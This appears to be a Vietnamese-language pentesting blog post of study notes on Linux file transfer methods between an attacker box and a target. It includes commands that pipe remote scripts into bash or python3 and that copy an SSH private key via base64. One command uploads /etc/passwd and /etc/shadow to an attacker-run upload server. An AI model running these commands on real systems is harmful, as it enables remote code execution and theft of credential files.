Post

Linux File Transfer Methods

Posted
By Mr.Kevin
views 3 min read
Linux File Transfer Methods

Covers các phương pháp transfer file trên môi trường Linux ↔ Linux (Pwnbox ↔ Target). Hiểu rõ để dùng được cả hai hướng: download payload về targetexfiltrate data về Pwnbox.

1. Base64 Encoding — Không cần network

Dùng khi chỉ có terminal access, không có kết nối mạng trực tiếp giữa hai máy.

1
2
3
4
5
6
7
8

# [PWNBOX] Encode file thành chuỗi base64 (1 dòng duy nhất)
cat id_rsa | base64 -w 0; echo

# [TARGET] Paste chuỗi base64 vào, decode ra file
echo -n 'LS0tLS1CRUdJ...' | base64 -d > id_rsa

# Verify integrity
md5sum id_rsa

Tại sao dùng -w 0? Mặc định base64 wrap dòng sau 76 ký tự → -w 0 ép thành 1 dòng duy nhất, dễ copy/paste hơn.

2. wget & cURL — HTTP Download

1
2
3
4
5

# wget — dùng -O (chữ HOA)
wget https://example.com/LinEnum.sh -O /tmp/LinEnum.sh

# curl — dùng -o (chữ thường)
curl -o /tmp/LinEnum.sh https://example.com/LinEnum.sh
Mẹo nhớ: wget → -O (Output, HOA)curl → -o (output, thường)

3. Fileless Attack — Thực thi không ghi disk

1
2
3
4
5

# curl pipe vào bash
curl https://example.com/LinEnum.sh | bash

# wget pipe vào python3
wget -qO- https://example.com/script.py | python3

Một số payload như mkfifo vẫn tạo file tạm trên disk dù dùng pipe — kiểm tra kỹ payload trước khi kết luận là “fileless hoàn toàn”.

4. Bash /dev/tcp — Không cần binary nào

Built-in của Bash, không cần cài thêm gì. Yêu cầu Bash ≥ 2.04 (compiled với --enable-net-redirections).

1
2
3
4
5
6
7
8

# Bước 1 — mở TCP connection tới web server trên target
exec 3<>/dev/tcp/10.10.10.32/80

# Bước 2 — gửi HTTP GET request
echo -e "GET /LinEnum.sh HTTP/1.1\n\n" >&3

# Bước 3 — đọc response (nội dung file)
cat <&3

Target không có curl, wget, python — nhưng có Bash → đây là lựa chọn cuối cùng, cực kỳ stealthy.

5. SSH / SCP — Encrypted Transfer

1
2
3
4
5
6
7
8
9
10
11

# Bật SSH server
sudo systemctl enable ssh && sudo systemctl start ssh

# Download từ target về Pwnbox
scp user@<TARGET_IP>:/root/secret.txt .

# Upload từ Pwnbox lên target
scp /tmp/shell.sh user@<TARGET_IP>:/tmp/

# Dùng private key
scp -i id_rsa user@<TARGET_IP>:/home/user/file.txt .

Syntax SCP: Giống cp nhưng thêm user@IP: vào path remote. scp <nguồn> <đích> — nguồn hoặc đích có thể là remote.

6. Mini Web Server trên Target

1
2
3
4
5
6
7
8
9
10
11

# Python 3 (ưu tiên)
python3 -m http.server 8000

# Python 2.7
python2.7 -m SimpleHTTPServer 8000

# PHP
php -S 0.0.0.0:8000

# Ruby
ruby -run -ehttpd . -p8000

1
2
3

# [PWNBOX] Download file từ target về
wget http://<TARGET_IP>:8000/filetotransfer.txt
curl -o filetotransfer.txt http://<TARGET_IP>:8000/filetotransfer.txt

Firewall inbound traffic trên target có thể bị block → nếu không kết nối được, kiểm tra firewall rules trước.

7. Web Upload qua HTTPS — uploadserver

1
2
3
4
5
6
7
8
9
10

# [PWNBOX] Cài module
sudo python3 -m pip install --user uploadserver

# Tạo self-signed certificate
openssl req -x509 -out server.pem -keyout server.pem \
  -newkey rsa:2048 -nodes -sha256 -subj '/CN=server'

# Dựng HTTPS upload server
mkdir https && cd https
sudo python3 -m uploadserver 443 --server-certificate ~/server.pem

1
2
3
4
5

# [TARGET] Upload file lên Pwnbox
curl -X POST https://<PWNBOX_IP>/upload \
  -F 'files=@/etc/passwd' \
  -F 'files=@/etc/shadow' \
  --insecure

Tại sao --insecure? Self-signed cert không có CA ký → curl từ chối mặc định → --insecure bypass SSL verification.

Quick Reference

HướngPhương phápCommand chínhĐiều kiện
Không cần mạngBase64cat file \| base64 -w 0Terminal access
Downloadwgetwget URL -O filewget có sẵn
Downloadcurlcurl -o file URLcurl có sẵn
Download/dev/tcpexec 3<>/dev/tcp/IP/80Bash ≥ 2.04
DownloadSCPscp user@IP:/path .SSH creds
Download filelesscurl pipecurl URL \| bashcurl có sẵn
UploadSCPscp file user@IP:/pathSSH creds
Uploadcurl POSTcurl -X POST -F 'files=@/path'uploadserver
Serve filePython/PHP/Rubypython3 -m http.serverLanguage có sẵn
Pentest, File Transfer
file-transfer linux wget curl scp base64 python http
This post is licensed under CC BY 4.0 by the author.